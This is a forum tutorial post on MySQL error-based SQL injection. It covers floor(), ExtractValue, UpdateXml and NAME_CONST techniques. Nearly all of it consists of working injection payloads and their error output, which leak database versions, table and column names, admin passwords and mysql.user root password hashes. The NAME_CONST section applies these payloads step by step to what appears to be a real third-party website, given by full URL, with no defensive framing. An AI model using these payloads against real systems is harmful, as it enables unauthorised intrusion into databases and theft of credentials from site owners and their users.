中国网络渗透测试联盟

Title: MySQL error-based injection: exploitation via the floor, ExtractValue and UpdateXml error modes

Author: admin    Time: 2015-11-11 19:03

1. Error-based injection via floor()

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First, run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

The MySQL version is leaked in the duplicate-entry error. To retrieve other data, replace version() with another subquery.
For example, to retrieve the administrator's user name and password:

Method 1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id=1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method 2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'



Further collected material:

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

Error-based injection trick for newer MySQL versions: injection via NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There aren't many papers documenting this method, so it feels kind of good to be the one to make a guide for it.
Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const

Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'


Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax; it just wouldn't work there. Luckily, they work here, so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'


Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--


So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off.

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.

Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2